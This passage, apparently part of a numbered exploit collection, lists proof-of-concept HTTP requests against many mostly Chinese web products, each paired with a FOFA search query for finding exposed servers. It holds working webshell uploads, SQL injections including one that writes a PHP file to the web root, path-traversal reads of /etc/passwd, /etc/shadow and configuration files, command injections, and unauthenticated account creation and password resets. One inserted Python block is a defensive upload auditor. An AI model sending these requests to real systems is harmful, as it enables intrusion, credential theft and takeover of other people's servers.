GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) smart parking charging system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

The uploaded file is then reachable at http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

The uploaded file is then reachable at http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--


164. Huixiaoyuan (Anxiaoyi) smart campus management system (慧校园(安校易)管理系统) FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

The uploaded file is then reachable at http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinher OA (金和OA) C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinher OA (金和OA) C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

The uploaded file is then reachable with:
GET /imc/primepush/%2e%2e/flex/12234.txt
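Every multipart upload above (entries 155, 157, 162, 163, 164, 176 and 178) works because the server trusts either the declared Content-Type or the client-supplied filename. The following is an added example, not part of the original post and not code from any of the listed products, of what a hardened upload handler or a WAF rule should check before the file reaches disk: parse the multipart body, compare the declared MIME type with the file's magic bytes, reject server-side script extensions and path separators in the filename, and look for script markers in the body. The sample parts are constructed from entries 155, 157 and 164; SCRIPT_EXTENSIONS and MAGIC are short illustrative lists, not a complete policy.

```python
"""Audit a multipart/form-data upload before anything is written to disk.

Added example, not part of the original post or of any listed product. The
sample body is constructed from the upload PoCs above; SCRIPT_EXTENSIONS and
MAGIC are short illustrative lists, not a complete policy.
"""
import re

SCRIPT_EXTENSIONS = {".php", ".php5", ".phtml", ".jsp", ".jspx", ".asp", ".aspx", ".asmx", ".ashx"}
MAGIC = {"image/png": b"\x89PNG\r\n\x1a\n", "image/jpeg": b"\xff\xd8\xff", "image/gif": b"GIF8"}
SCRIPT_MARKERS = (b"<?php", b"<%", b"<script")

_FILENAME = re.compile(r'filename="([^"]*)"')
_FIELD = re.compile(r'(?:^|;)\s*name="([^"]*)"')   # does not match inside filename="..."


def boundary_from_content_type(content_type):
    match = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not match:
        raise ValueError("no boundary in Content-Type")
    return match.group(2)


def parse_multipart(body, boundary):
    """Return [(headers, data)] per part; header names lower-cased, data without its trailing CRLF."""
    delimiter = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):            # closing delimiter
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        raw_headers, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in raw_headers.decode("latin-1").split("\r\n"):
            key, sep, value = line.partition(":")
            if sep:
                headers[key.strip().lower()] = value.strip()
        parts.append((headers, data[:-2] if data.endswith(b"\r\n") else data))
    return parts


def audit_upload(content_type, body):
    """Return [(field, filename, reasons)] for every file part a hardened handler should reject."""
    rejected = []
    for headers, data in parse_multipart(body, boundary_from_content_type(content_type)):
        disposition = headers.get("content-disposition", "")
        filename_match = _FILENAME.search(disposition)
        if not filename_match:
            continue                                   # plain form field, not a file
        filename = filename_match.group(1)
        field_match = _FIELD.search(disposition)
        field = field_match.group(1) if field_match else ""
        declared = headers.get("content-type", "").split(";")[0].strip().lower()
        reasons = []
        base = filename.replace("\\", "/").rsplit("/", 1)[-1]
        if base != filename:
            reasons.append("path separators in filename")
        ext = "." + base.rsplit(".", 1)[-1].lower() if "." in base else ""
        if ext in SCRIPT_EXTENSIONS:
            reasons.append("server-side script extension " + ext)
        if declared in MAGIC and not data.startswith(MAGIC[declared]):
            reasons.append("content does not match declared " + declared)
        if data.lstrip().startswith(SCRIPT_MARKERS):
            reasons.append("script markers in file body")
        if reasons:
            rejected.append((field, filename, reasons))
    return rejected


BOUNDARY = "----WebKitFormBoundary1imovELzPsfzp5dN"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY


def build_body(parts):
    """Build a CRLF multipart body from (field, filename_or_None, content_type_or_None, data)."""
    out = b""
    for field, filename, ctype, data in parts:
        disposition = 'Content-Disposition: form-data; name="%s"' % field
        if filename is not None:
            disposition += '; filename="%s"' % filename
        out += b"--" + BOUNDARY.encode() + b"\r\n" + disposition.encode() + b"\r\n"
        if ctype:
            out += b"Content-Type: " + ctype.encode() + b"\r\n"
        out += b"\r\n" + data + b"\r\n"
    return out + b"--" + BOUNDARY.encode() + b"--\r\n"


# Constructed from entries 155, 164 and 157 above, plus a benign PNG and a plain field.
SAMPLE_PARTS = [
    ("file", "test.php", "image/png", b"<?php phpinfo();unlink(__FILE__);?>"),
    ("Filedata", "qaz.aspx", "image/jpeg", b'<%@Page Language="C#"%><%Response.Write("x");%>'),
    ("file", "kjldycpvjrm.jsp", "application/octet-stream", b"nyhelxrutzwhrsvsrafb"),
    ("file", "logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ("key", None, None, b"null"),
]

if __name__ == "__main__":
    for field, filename, reasons in audit_upload(CONTENT_TYPE, build_body(SAMPLE_PARTS)):
        print(field, filename, reasons)
```

The audit rejects the three script uploads and passes the real PNG and the plain form field. In production the client-supplied filename should not be reused at all; entry 155 shows that renaming alone is not enough when the extension is kept (the file still lands as img_664ab7fd14d2c.php).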

179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke CRM (帮管客 CRM) jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申信息科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申科技) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (广州图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor Tianyi application virtualization system (瑞友天翼应用虚拟化系统) SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi Jiahui video conferencing (叁体-佳会视频会议) attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. Lanwon (蓝网科技) clinical image viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=1

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV (aliyundrive-webdav) command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
